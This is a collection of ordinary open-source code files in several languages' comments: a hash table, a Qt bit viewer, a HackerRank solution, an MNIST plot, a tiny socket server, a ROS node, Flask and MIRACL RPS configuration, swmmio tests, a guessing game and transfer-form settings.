result\n","sub_path":"chap04_sequences/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"467851883","text":"import sys\nsys.path.append(\"../dictionary_tree/dictionary\")\nfrom dictionaryUnorderedLinkedList import DictionaryUnorderedLinkedList\nimport hashFunctions\n\nclass DictCollisionListHash:\n \"\"\" Implementa una tabella hash con liste di collisione.\n\n Supporta le classiche operazioni di insert, search and delete key.\n \"\"\"\n def __init__(self, size, singleHashFunction):\n if type(size) is not int:\n raise ValueError\n self.lists = size * [None]\n self.size = size\n for i in range(size):\n self.lists[i] = DictionaryUnorderedLinkedList()\n self.hashFunction = singleHashFunction\n\n def insert(self, key, value):\n ind = self.hashFunction.hash(key, self.size)\n self.lists[ind].insert(key, value)\n\n def delete(self, key):\n ind = self.hashFunction.hash(key, self.size)\n self.lists[ind].delete(key)\n\n def search(self, key):\n ind = self.hashFunction.hash(key, self.size)\n return self.lists[ind].search(key)\n\n def stampa(self):\n for i in range(0, self.size):\n self.lists[i].theList.stampa()\n\n\nif __name__ == \"__main__\":\n size = 13;\n fdiv = hashFunctions.HashFunction_module()\n frip = hashFunctions.HashFunction_Adv()\n\n print (\"Metodo divisione\")\n\n diz = DictCollisionListHash(size, fdiv)\n for i in range(0, 30):\n print (\"insert(\" + str(i) + \",\" + str(2 * i) + \")\")\n diz.insert(i, 2 * i)\n diz.stampa()\n\n print (\"Metodo ripiegamento\")\n\n diz = DictCollisionListHash(size, frip)\n for i in range(0, 30):\n print (\"insert(\" + str(i) + \",\" + str(2 * i) + \")\")\n diz.insert(i, 2 * i)\n diz.stampa()\n\n","sub_path":"hash_table/collisionsListHash.py","file_name":"collisionsListHash.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349488157","text":"import struct\r\nimport ctypes\r\nfrom PySide import QtGui\r\nfrom PySide.QtCore import Qt, QPoint\r\nfrom ui.MainWindow_ui import Ui_MainWindow\r\nfrom app_info import APP_INFO\r\n\r\n\r\nBITS_PER_NIBBLE = 4\r\nNIBBLES_PER_ROW = 8\r\nROW_CNT = 2 # Adjust to 1 for 32-bit, 4 for 128-bit\r\n\r\nMAX_BIT_POS = (BITS_PER_NIBBLE * NIBBLES_PER_ROW * ROW_CNT) - 
1\r\n\r\nMAX_U64 = 2 ** (MAX_BIT_POS + 1) - 1\r\nMIN_U64 = 0\r\nMAX_S64 = 2 ** MAX_BIT_POS - 1\r\nMIN_S64 = (~((1 << MAX_BIT_POS) - 1))\r\n\r\nMAX_U32 = 2 ** 32 - 1\r\nMIN_U32 = 0\r\nMAX_S32 = 2 ** 31 - 1\r\nMIN_S32 = (~((1 << 31) - 1))\r\n\r\nROW_HEIGHT = 100\r\nROW_WIDTH = 950\r\n\r\nNIB_MGN = 5\r\nNIB_WIDTH = (ROW_WIDTH - (NIB_MGN * (NIBBLES_PER_ROW + 1)))/NIBBLES_PER_ROW\r\n\r\nBIT_MGN = 3\r\nBIT_WIDTH = (NIB_WIDTH - (BIT_MGN * (BITS_PER_NIBBLE + 1)))/BITS_PER_NIBBLE\r\n\r\n\r\nclass ValUnion(ctypes.Union):\r\n _fields_ = [(\"uint64\", ctypes.c_uint64),\r\n (\"int64\", ctypes.c_int64),\r\n (\"double\", ctypes.c_double),\r\n (\"uint32\", ctypes.c_uint32),\r\n (\"int32\", ctypes.c_int32),\r\n (\"float\", ctypes.c_float)]\r\n\r\n\r\nclass MainWindow(QtGui.QMainWindow, Ui_MainWindow):\r\n def __init__(self, *args, **kwargs):\r\n super(MainWindow, self).__init__(*args, **kwargs)\r\n\r\n self._line_bit_val_map = {}\r\n self._label_bit_pos_map = {}\r\n self._label_nib_val_lst = []\r\n\r\n self._last_val_cache = {} # key is QLineEdit, val is last val\r\n\r\n self.setupUi(self)\r\n self.init_ui()\r\n\r\n self.resize(self.width(), self.height() + ROW_CNT * ROW_HEIGHT + self.gridLayout.getContentsMargins()[3])\r\n\r\n self.setWindowTitle(APP_INFO.APP_NAME)\r\n self.setWindowIcon(QtGui.QIcon(\":/icons/icon.ico\"))\r\n\r\n self.actionAbout.triggered.connect(self.actionAbout_triggered)\r\n self.actionAbout_Qt.triggered.connect(self.actionAbout_Qt_triggered)\r\n\r\n def actionAbout_triggered(self):\r\n QtGui.QMessageBox.about(\r\n self,\r\n APP_INFO.APP_NAME,\r\n \"\"\"\r\n
{APP_NAME}\r\n\r\n Author: {APP_AUTHOR}\r\n Version: {Major}.{Minor}.{Revision}
\r\n \"\"\".format(\r\n APP_NAME=APP_INFO.APP_NAME,\r\n APP_AUTHOR=APP_INFO.APP_AUTHOR,\r\n Major=APP_INFO.APP_VERSION.Major,\r\n Minor=APP_INFO.APP_VERSION.Minor,\r\n Revision=APP_INFO.APP_VERSION.Revision\r\n )\r\n )\r\n\r\n def actionAbout_Qt_triggered(self):\r\n QtGui.QMessageBox.aboutQt(self)\r\n\r\n def init_ui(self):\r\n # get default line edit height for some calculations\r\n line_edit_height = self.line_uhex64.size().height()\r\n\r\n for row in xrange(ROW_CNT):\r\n for nib in xrange(NIBBLES_PER_ROW):\r\n lb_nib_val = QtGui.QLabel(self.wgt_bit_cont)\r\n size = lb_nib_val.size()\r\n size.setWidth(NIB_WIDTH)\r\n lb_nib_val.resize(size)\r\n lb_nib_val.move(\r\n NIB_MGN + (NIB_WIDTH + NIB_MGN) * nib,\r\n row * ROW_HEIGHT)\r\n lb_nib_val.setAlignment(Qt.AlignHCenter)\r\n lb_nib_val.setText('0')\r\n self._label_nib_val_lst.insert(0, lb_nib_val)\r\n\r\n for bit in xrange(BITS_PER_NIBBLE):\r\n line_bit_val = QtGui.QLineEdit(self.wgt_bit_cont)\r\n line_bit_val.setReadOnly(True)\r\n line_bit_val.setMaxLength(1)\r\n line_bit_val.move(\r\n NIB_MGN + (NIB_MGN + NIB_WIDTH) * nib + BIT_MGN + bit * (BIT_WIDTH + BIT_MGN),\r\n row * ROW_HEIGHT + 20)\r\n size = line_bit_val.size()\r\n size.setWidth(BIT_WIDTH)\r\n line_bit_val.resize(size)\r\n line_bit_val.setAlignment(Qt.AlignHCenter)\r\n line_bit_val.setText(\"0\")\r\n\r\n def mkfunc(line):\r\n return lambda: self._bit_val_edited(line)\r\n line_bit_val.editingFinished.connect(mkfunc(line_bit_val))\r\n\r\n def mkfunc(line):\r\n return lambda ev: self._bit_val_double_click(line, ev)\r\n line_bit_val.mouseDoubleClickEvent = mkfunc(line_bit_val)\r\n\r\n bit_pos = MAX_BIT_POS - (BITS_PER_NIBBLE * nib) - (BITS_PER_NIBBLE * NIBBLES_PER_ROW * row) - bit\r\n\r\n self._line_bit_val_map[bit_pos] = line_bit_val\r\n\r\n lb_bit_pos = QtGui.QLabel(self.wgt_bit_cont)\r\n lb_bit_pos.move(\r\n NIB_MGN + (NIB_MGN + NIB_WIDTH) * nib + BIT_MGN + bit * (BIT_WIDTH + BIT_MGN),\r\n row * ROW_HEIGHT + 20 + line_edit_height)\r\n lb_bit_pos.setFixedWidth(BIT_WIDTH)\r\n lb_bit_pos.setAlignment(Qt.AlignHCenter)\r\n lb_bit_pos.setText(str(bit_pos))\r\n lb_bit_pos.mouseDoubleClickEvent = mkfunc(line_bit_val)\r\n\r\n self._label_bit_pos_map[bit_pos] = lb_bit_pos\r\n\r\n for (line, base, fmt, minv, maxv, field) in (\r\n (self.line_udec64, 10, \"d\", MIN_U64, MAX_U64, \"uint64\"),\r\n (self.line_sdec64, 10, \"d\", MIN_S64, MAX_S64, \"int64\"),\r\n (self.line_udec32, 10, \"d\", MIN_U32, MAX_U32, \"uint32\"),\r\n (self.line_sdec32, 10, \"d\", MIN_S32, MAX_S32, \"int32\"),\r\n (self.line_uhex64, 16, \"X\", MIN_U64, MAX_U64, \"uint64\"),\r\n (self.line_shex64, 16, \"X\", MIN_S64, MAX_S64, \"int64\"),\r\n (self.line_uhex32, 16, \"X\", MIN_U32, MAX_U32, \"uint32\"),\r\n (self.line_shex32, 16, \"X\", MIN_S32, MAX_S32, \"int32\"),\r\n (self.line_uoct64, 8, \"o\", MIN_U64, MAX_U64, \"uint64\"),\r\n (self.line_soct64, 8, \"o\", MIN_S64, MAX_S64, \"int64\"),\r\n (self.line_uoct32, 8, \"o\", MIN_U32, MAX_U32, \"uint32\"),\r\n (self.line_soct32, 8, \"o\", MIN_S32, MAX_S32, \"int32\"),\r\n (self.line_binary, 2, \"b\", MIN_U64, MAX_U64, \"uint64\")\r\n ):\r\n def mkfunc(line, base, fmt, minv, maxv, field):\r\n return lambda: self._handle_i_edited(line, base, fmt, minv, maxv, field)\r\n line.editingFinished.connect(mkfunc(line, base, fmt, minv, maxv, field))\r\n self._last_val_cache[line] = \"\"\r\n\r\n self.line_float.editingFinished.connect(lambda: self._handle_f_edited(self.line_float, \"float\"))\r\n self._last_val_cache[self.line_float] = ''\r\n self.line_double.editingFinished.connect(lambda: 
self._handle_f_edited(self.line_double, \"double\"))\r\n self._last_val_cache[self.line_double] = ''\r\n\r\n def _handle_i_edited(self, line, base, fmt, minval, maxval, field):\r\n msg = None\r\n text = line.text().replace(' ', '')\r\n\r\n if self._last_val_cache[line] == text:\r\n return\r\n\r\n try:\r\n val = int(text, base)\r\n if val > maxval:\r\n msg = \"Exceeded max value of \" + format(maxval, fmt)\r\n elif val < minval:\r\n msg = \"Under min value of \" + format(minval, fmt)\r\n except ValueError:\r\n msg = \"Invalid format.\"\r\n except Exception:\r\n msg = \"Unknown error.\"\r\n\r\n if msg is None:\r\n union = ValUnion()\r\n setattr(union, field, val)\r\n self._set_new_val(union)\r\n else:\r\n line.setStyleSheet(\"border: 1px solid red\")\r\n line.setToolTip(msg)\r\n QtGui.QToolTip.showText(line.mapToGlobal(QPoint(0, 0)), msg)\r\n\r\n def _handle_f_edited(self, line, field):\r\n msg = None\r\n text = line.text().replace(' ', '')\r\n\r\n if self._last_val_cache[line] == text:\r\n return\r\n\r\n try:\r\n val = float(text)\r\n except ValueError:\r\n msg = \"Invalid format.\"\r\n except Exception:\r\n msg = \"Unknown error.\"\r\n\r\n if msg is None:\r\n union = ValUnion()\r\n setattr(union, field, val)\r\n self._set_new_val(union)\r\n else:\r\n line.setStyleSheet(\"border: 1px solid red\")\r\n line.setToolTip(msg)\r\n QtGui.QToolTip.showText(line.mapToGlobal(QPoint(0, 0)), msg)\r\n\r\n def _bit_val_double_click(self, line, event):\r\n text = line.text()\r\n if text == '0':\r\n line.setText('1')\r\n else:\r\n line.setText('0')\r\n self._bit_val_edited(line)\r\n\r\n def _bit_val_edited(self, line):\r\n text = line.text()\r\n if text not in ('0', '1'):\r\n line.setText('0')\r\n\r\n new_val = 0\r\n for bit_pos, line_edit in self._line_bit_val_map.iteritems():\r\n to_set = line_edit.text() == '1'\r\n\r\n if to_set:\r\n new_val |= (1 << bit_pos)\r\n\r\n union = ValUnion()\r\n union.uint64 = new_val\r\n self._set_new_val(union)\r\n\r\n def _set_new_val(self, union):\r\n\r\n for line, fmt, line_val in (\r\n (self.line_udec64, \"{:d}\", union.uint64),\r\n (self.line_sdec64, \"{:d}\", union.int64),\r\n (self.line_uhex64, \"{:016X}\", union.uint64),\r\n (self.line_shex64, \"{:016X}\", union.int64),\r\n (self.line_uoct64, \"{:o}\", union.uint64),\r\n (self.line_soct64, \"{:o}\", union.int64),\r\n (self.line_binary, \"{:064b}\", union.uint64)\r\n ):\r\n line.setText(fmt.format(line_val))\r\n self._last_val_cache[line] = line.text()\r\n line.setStyleSheet(\"\")\r\n line.setToolTip(\"\")\r\n\r\n for line, fmt, line_val in (\r\n (self.line_udec32, \"{:d}\", union.uint32),\r\n (self.line_sdec32, \"{:d}\", union.int32),\r\n (self.line_uhex32, \"{:08X}\", union.uint32),\r\n (self.line_shex32, \"{:08X}\", union.int32),\r\n (self.line_uoct32, \"{:o}\", union.uint32),\r\n (self.line_soct32, \"{:o}\", union.int32)\r\n ):\r\n line.setText(fmt.format(line_val))\r\n self._last_val_cache[line] = line.text()\r\n line.setStyleSheet(\"\")\r\n line.setToolTip(\"\")\r\n\r\n self.line_float.setText(str(union.float))\r\n self._last_val_cache[line] = self.line_float.text()\r\n self.line_float.setStyleSheet(\"\")\r\n self.line_float.setToolTip(\"\")\r\n\r\n self.line_double.setText(str(union.double))\r\n self._last_val_cache[line] = self.line_double.text()\r\n self.line_double.setStyleSheet(\"\")\r\n self.line_double.setToolTip(\"\")\r\n\r\n uval = union.uint64\r\n for bit_pos in xrange(MAX_BIT_POS + 1):\r\n line = self._line_bit_val_map.get(bit_pos)\r\n lbl = self._label_bit_pos_map.get(bit_pos)\r\n\r\n bit_val = 
(uval >> bit_pos) & 1\r\n line.setText(str(bit_val))\r\n\r\n fnt = line.font()\r\n if bit_val == 1:\r\n fnt.setBold(True)\r\n else:\r\n fnt.setBold(False)\r\n line.setFont(fnt)\r\n\r\n fnt = lbl.font()\r\n if bit_val == 1:\r\n fnt.setBold(True)\r\n else:\r\n fnt.setBold(False)\r\n lbl.setFont(fnt)\r\n\r\n for nib in xrange((MAX_BIT_POS + 1)/BITS_PER_NIBBLE):\r\n nib_val = (uval >> (nib * BITS_PER_NIBBLE)) & 0xF\r\n lbl = self._label_nib_val_lst[nib]\r\n lbl.setText('{:X}'.format(nib_val))\r\n","sub_path":"src/widgets/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":11390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386899240","text":"\"\"\"\nGiven a sequence of integers, where each element is distinct and satisfies . For each where , find any integer such that and print the value of on a new line.\n\nFor example, assume the sequence . Each value of between and , the length of the sequence, is analyzed as follows:\n\n, so \n, so \n, so \n, so \n, so \nThe values for are .\n\nFunction Description\n\nComplete the permutationEquation function in the editor below. It should return an array of integers that represent the values of .\n\npermutationEquation has the following parameter(s):\n\np: an array of integers\nInput Format\n\nThe first line contains an integer , the number of elements in the sequence.\nThe second line contains space-separated integers where .\n\nConstraints\n\n, where .\nEach element in the sequence is distinct.\nOutput Format\n\nFor each from to , print an integer denoting any valid satisfying the equation on a new line.\n\nSample Input 0\n\n3\n2 3 1\nSample Output 0\n\n2\n3\n1\nExplanation 0\n\nGiven the values of , , and , we calculate and print the following values for each from to :\n\n, so we print the value of on a new line.\n, so we print the value of on a new line.\n, so we print the value of on a new line.\nSample Input 1\n\n5\n4 3 5 1 2\nSample Output 1\n\n1\n3\n5\n4\n2\n\"\"\"\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the permutationEquation function below.\n\n\ndef permutationEquation(p):\n # 이 문제는 생각하기 간단하면서도, 생각이 제대로 안떠오르면 어려운 문제다.\n # p.index(p.index)를 넣어 사용하는 문제라...\n\n # pythonic solution 1\n # return [(p.index(p.index(i)+1)+1) for i in range(1, max(p)+1)]\n\n # my solution 2\n result = []\n for i in range(1, max(p)+1):\n result.append(p.index(p.index(i)+1)+1)\n return result\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n p = list(map(int, input().rstrip().split()))\n\n result = permutationEquation(p)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","sub_path":"problem_solving/2020-03-12-Sequence-Equation.py","file_name":"2020-03-12-Sequence-Equation.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"84473476","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\ndatas=pd.read_csv(\"mnist_train.csv\",header=None)\r\nprint(datas.shape)\r\ncolumnss=['label']\r\nfor i in range(784):\r\n 
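# one name per pixel of the flattened 28x28 MNIST image: px_0 .. px_783 (the label column was added first)\r\n 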
columnss.append(f\"px_{i}\")\r\ndatas.columns=columnss\r\nsize_of_image=28\r\nmatrix_datas=datas.values\r\ndigit=matrix_datas[0,:]\r\ndigit=digit[1:]\r\nprint(digit.shape);\r\nimage=digit.reshape(28,28)\r\nprint(image.shape)\r\nplt.plot(image,color='k')\r\nplt.show()\r\n\r\n\r\n","sub_path":"T/letter recognition. pandas.py","file_name":"letter recognition. pandas.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"248706848","text":"import socket\n\nsock = socket.socket()\nhost = ''\nport = 5050\nsock.bind((host, port))\nsock.listen(1)\nconn, addr = sock.accept()\n\nprint('connected:', addr)\nf = conn.recv(1024)\nprint(f.decode('utf-8'))","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42346587","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport time\n\n\nclass TLScanner(object):\n def __init__(self):\n rospy.init_node('tl_scanner')\n\n self.light_classifier = TLClassifier()\n\n self.camera_image = None\n self.bridge = CvBridge()\n\n self.min_interval = 0.25\n self.prev_time = time.time()\n\n rospy.Subscriber('/image_color', Image, self.image_cb)\n rospy.spin()\n\n def image_cb(self, msg):\n delta_time = time.time() - self.prev_time\n if delta_time >= self.min_interval:\n self.prev_time = time.time()\n else:\n return\n\n self.camera_image = msg\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"rgb8\")\n self.light_classifier.infer(cv_image)\n\n\nif __name__ == '__main__':\n try:\n TLScanner()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_scanner.py","file_name":"tl_scanner.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298617021","text":"#!usr/bin/env python\nimport os\n\nfrom flask.ext.script import Manager, Shell\nfrom flask.ext.migrate import Migrate, MigrateCommand\n\nfrom app import create_app, db\nfrom app.models import User, Role\n\n# Create an app and set up the command line arguments to run the app as\n# a command line program.\n\napp = create_app(os.getenv('NAMEBASE_CONFIG') or 'default')\nmanager = Manager(app)\nmigrate = Migrate(app, db)\n\n@manager.command\ndef test():\n # Run the unit tests.\n import unittest\n\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)\n\n\ndef make_shell_context():\n return {\n app: app,\n db: db,\n User: User,\n Role: Role,\n }\n\n\nmanager.add_command('shell', Shell(make_context=make_shell_context))\nmanager.add_command('db', MigrateCommand)\n\nif __name__ == '__main__':\n manager.run()","sub_path":"namebase.py","file_name":"namebase.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590933215","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. 
The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import unicode_literals\n\n\"\"\"HTTP server settings\"\"\"\naddress = '127.0.0.1'\nport = 8011\n\n\"\"\"Set Access-Control-Allow-Origin header\"\"\"\n# allowOrigin = ['*']\n\n\"\"\"Time synchronization\n\nTo be able to perform time based verification, by default RPS syncs its time\nwith MIRACL servers. If you set it to False, you should still sync the server\nusing an accurate NTP time server!\n\"\"\"\n# syncTime = False\n\n\"\"\"\nDynamic options url\n\nLocation to be queried for dynamically (runtime) changeable options.\n'None' mean dynamic options are disabled and it is default value.\n\"\"\"\n# dynamicOptionsURL = None # Default\n\n\"\"\"The location of your keys file (relative to mpin-backend/servers/dta).\"\"\"\ncredentialsFile = '%CREDENTIALSFILE%'\n\n\"\"\"Entropy sources\n\nD-TA supports multiple ways to gather entropy random, urandom, certivox or\ncombination of those.\n\"\"\"\n# EntropySources = 'dev_urandom:100' # Default\n# EntropySources = 'certivox:100'\n# EntropySources = 'dev_urandom:60,certivox:40'\n\n\"\"\"MIRACL server secret share acquisition\n\n- dta - get server secret from MIRACL dta automatically on start\n- credentials.json - get server secret from credentials.json (key: certivox_server_secret)\n- manual - service will prompt for it\n- the secret itself\n\nYou can get your MIRACL server secret by:\n ./scripts/getServerSecretShare.py credentials.json\nwhich will output your credentials json including certivox_server_secret.\nNOTE: Don't pipe it directly to the same file - you'll lose your original\n credentials file.\nAlternatively you can copy only your certivox_server_secret value and supply it\neither manually or via config.py setting the certivoxServerSecret to the\ncorresponding value.\n\"\"\"\n# certivoxServerSecret = 'dta' # Default\n\n\"\"\"Local DTA address.\"\"\"\nDTALocalURL = 'http://127.0.0.1:8001'\n\n\"\"\"Access number options\n\n- enable access number\n- accessNumberExpireSeconds - The default time client will show the access number\n- accessNumberExtendValiditySeconds - Validity of the access number (on top of accessNumberExpireSeconds)\n- accessNumberUseCheckSum - Should access number have checksum\n\"\"\"\n# requestOTP = True\n# accessNumberExpireSeconds = 60 # Default\n# accessNumberExtendValiditySeconds = 5 # Default\n# accessNumberUseCheckSum = True # Default\n\n\"\"\"Authentication options\n\n- waitForLoginResult -For the mobile flow. Wait the browser login before showing the Done/Logout button.\n\"\"\"\nwaitForLoginResult = True\n# VerifyUserExpireSeconds = 3600 # Default\n# maxInvalidLoginAttempts = 3 # Default\n# cacheTimePermits = True #Default\n\n\"\"\"RPA options\n\n- RPAPermitUserURL - RPA Revocation endpoint\n- RegisterForwardUserHeaders - Coma separated list of headers\n - '' - do not forward headers\n - * - forward all headers\n- LogoutURL - RPA Logout url. 
For logout using the mobile client.\r\n\"\"\"\r\nRPAVerifyUserURL = 'http://127.0.0.1:8005/mpinVerify'\r\n# RPAPermitUserURL = 'http://127.0.0.1:8005/mpinPermitUser'\r\nRPAAuthenticateUserURL = '/mpinAuthenticate'\r\nRegisterForwardUserHeaders = ''\r\nLogoutURL = '/logout'\r\n\r\n\"\"\"PIN pad client options\"\"\"\r\n# Need to specify the url where the RPS is accessible like: http://<address>
:\nrpsBaseURL = \"http://%s:%s/\" % (address, port) # URL where RPS is accesable\nrpsPrefix = 'rps' # Default\n# setDeviceName = True\n\n\"\"\"Mobile client options\"\"\"\n# mobileUseNative = True # False by default\nserviceName = \"Milagro MFA Demo\"\nserviceType = \"online\" # Default\nserviceIconUrl = \"http://example.com/icon.jpg\"\nmobileService = {\n \"name\": serviceName,\n \"url\": rpsBaseURL,\n \"rps_prefix\": rpsPrefix,\n \"logo_url\": serviceIconUrl,\n \"type\": serviceType\n }\n\n\"\"\"Key value storage options\"\"\"\nstorage = 'memory'\n\n# storage = 'redis'\n# redisHost = '127.0.0.1' # Default\n# redisPort = 6379 # Default\n# redisDB = 0 # Default\n# redisPassword = None # Default\n# redisPrefix = 'mpin' # Default\n\n# storage = 'json'\n# fileStorageLocation = './mpin_rps_storage.json'\n\n\"\"\"Debug options\"\"\"\n# logLevel = \"INFO\"\n\n\"\"\"Use NFC flag for mobile clients\"\"\"\nuseNFC = False\n","sub_path":"servers/rps/config_default.py","file_name":"config_default.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"460019388","text":"import os\nimport tempfile\nfrom io import StringIO\nimport pandas as pd\nfrom swmmio.tests.data import (DATA_PATH, MODEL_FULL_FEATURES_XY, MODEL_FULL_FEATURES__NET_PATH, MODEL_A_PATH)\nimport swmmio\nfrom swmmio.graphics import swmm_graphics as sg\nfrom swmmio.utils.spatial import centroid_and_bbox_from_coords, change_crs\n\n\ndef test_draw_model():\n m = swmmio.Model(MODEL_FULL_FEATURES_XY)\n target_img_pth = os.path.join(DATA_PATH, 'test-draw-model.png')\n sg.draw_model(m, file_path=target_img_pth)\n\n assert os.path.exists(target_img_pth)\n os.remove(target_img_pth)\n\n\ndef test_draw_red_and_grey_nodes():\n m = swmmio.Model(MODEL_FULL_FEATURES__NET_PATH)\n target_img_pth = os.path.join(DATA_PATH, 'test-draw-model.png')\n nodes = m.nodes()\n nodes['draw_color'] = '#787882'\n nodes.loc[['J1', 'J2', 'J3'], 'draw_color'] = '#ff0000'\n nodes['draw_size'] = nodes['InvertElev'] * 3\n\n sg.draw_model(conduits=m.conduits(), nodes=nodes, file_path=target_img_pth)\n assert os.path.exists(target_img_pth)\n os.remove(target_img_pth)\n\n\ndef test_web_map_01():\n\n m = swmmio.Model(MODEL_A_PATH, crs=\"+init=EPSG:2817\")\n with tempfile.TemporaryDirectory() as tempdir:\n fname = os.path.join(tempdir, 'test-map.html')\n sg.create_map(m, filename=fname)\n\n assert os.path.exists(fname)\n\n\ndef test_centroid_and_bbox_from_coords():\n\n m = swmmio.Model(MODEL_A_PATH, crs=\"+init=EPSG:2817\")\n m.to_crs(\"+init=EPSG:4326\")\n\n c, bbox = centroid_and_bbox_from_coords(m.nodes.dataframe['coords'])\n assert c == (-70.97068150884797, 43.74695249578866)\n assert bbox == [-70.97068150884797, 43.74695249578866, -70.97068150884797, 43.74695249578866]\n\n c, bbox = centroid_and_bbox_from_coords([(0, 0), (0, 10), (10, 10), (10, 0)])\n assert c == (5, 5)\n assert bbox == [0, 0, 10, 10]\n\n\ndef test_change_crs():\n\n m = swmmio.Model(MODEL_A_PATH, crs=\"+init=EPSG:2817\")\n v1 = m.inp.vertices\n v2 = change_crs(m.inp.vertices, m.crs, \"+init=EPSG:4326\")\n assert v1.shape == v2.shape\n s = \"\"\"\n Name X Y \n J4-001.1 -70.959386 43.732851\n J4-001.1 -70.958415 43.732578\n J4-001.1 -70.959423 43.730452\n J2-095.1 -70.951378 43.767796\n \"\"\"\n v2_test = pd.read_csv(StringIO(s), index_col=0, delim_whitespace=True, skiprows=[0])\n assert v2.to_string() == 
v2_test.to_string()\n","sub_path":"swmmio/tests/test_graphics.py","file_name":"test_graphics.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"527917462","text":"import random\n\nprint('Добро пожаловать! Желаете ознакомиться с правилами игры?')\na = input('''>>> 1 - Да.\n>>> 2 - Нет.\n>>> ''')\nprint()\nif a == '1':\n print('''Добро пожаловать в наше казино!\nВашему вниманию предлагается игра \"Числовая угадайка\".\nЕё правила очень просты. Вам необходимо угадать случайное число от 1 до 100!\nУ вас будет 10 попыток.\nЧем меньше попыток вы потратите, тем больше увеличится ваша ставка.\nЕсли же вы не угадаете число, то ставка сгорает.\nВсё просто, я загадываю, ты отгадываешь!''')\nprint()\nprint('''Итак, начнём! Сколько фишек вы желаете приобрести?\n1 фишка = 100 $''')\nprint()\nn = int(input('Хочу фишек на такую сумму: '))\nprint()\nprint('Ваша сдача: ', n % 100)\nplayer_wallet = n // 100\n\ndef game(bid, wallet):\n wallet -= bid\n f = random.randint(0,1)\n i = 10\n while i > 0:\n n = int(input('Введите число: '))\n if n == f:\n print('Вы угадали число!')\n print('Ваша ставка увеличивается в', i, 'раз!!!')\n wallet += bid * i\n break\n elif f > n:\n print('Введенное число меньше, чем искомое.')\n i -= 1\n print('У вас осталось', i, 'попыток.')\n elif f < n:\n print('Введенное число больше, чем искомое.')\n i -= 1\n print('У вас осталось', i, 'попыток.')\n\n else:\n print('У вас кончились попытки, вы проиграли.')\n wallet -= bid\n\n return wallet\n\nwhile True:\n print('Ваш баланс составляет:', player_wallet)\n print()\n if player_wallet <= 0:\n print('К сожалению, ваш баланс не позволяет вам продолжить игру. Спасибо за игру!')\n break\n player_bid = int(input('Делайте вашу ставку >>> '))\n player_wallet = game(player_bid, player_wallet)\n print('Желаете продожить игру?')\n answer = int(input('''>>> 1 - Да.\n>>> 2 - Нет.\n>>> '''))\n if answer == 1:\n print('Отлично! 
Продолжаем!')\n continue\n else:\n print('Спасибо за игру!')\n break","sub_path":"mini_projects/Casino.py","file_name":"Casino.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"416573605","text":"# -*- coding: utf-8 -*-\nimport os\n\n\nPROJECT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\n# ========== EXCEL ============\nFINALS_WORKSHEET_NAME = \"סיכומים\".decode(\"utf-8\")\n\nEXCEL_EXTENSION = \".xls\"\n\nexcel_templates_folder = r\"\\\\Back-change\\c\\Bussines Scripts\\TransferConverter2\\Excel_Templates\"\n\nexcel_destination_folder = r\"\\\\Back-change\\c\\EXCELL DAILY RECORDS\"\n\n\n# ========= MONEYGRAM TEXT =======\nSEND_FORM = \"SEND FORM\"\n\nTYPE_CANCEL = \"CANCL\"\n\nTYPE_REFUND = \"REFND\"\n\nTYPE_RECEIVE = \"RECVD\"\n\nTYPE_SEND = \"SEND\"\n\nREFUND_FORM = \"MoneyGram REFUND FORM\"\n\nRECEIVE_FORM = \"MoneyGram RECEIVE FORM\"\n\n\n# ========== FILE_TEMPLATES ============\n\nRECEIVE_FORM_CUSTOMER_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\ReceiveForm\\CustomerCopy.html')\n\nRECEIVE_FORM_AGENT_TEMPLATE = 